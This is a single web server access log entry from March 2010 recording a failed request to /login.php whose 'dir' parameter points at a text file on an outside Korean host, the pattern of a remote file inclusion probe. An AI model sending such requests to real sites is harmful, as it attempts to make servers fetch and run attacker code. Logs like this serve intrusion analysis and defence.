61.111.3.35 - - [01/Mar/2010:08:55:36 -0800] "GET /login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
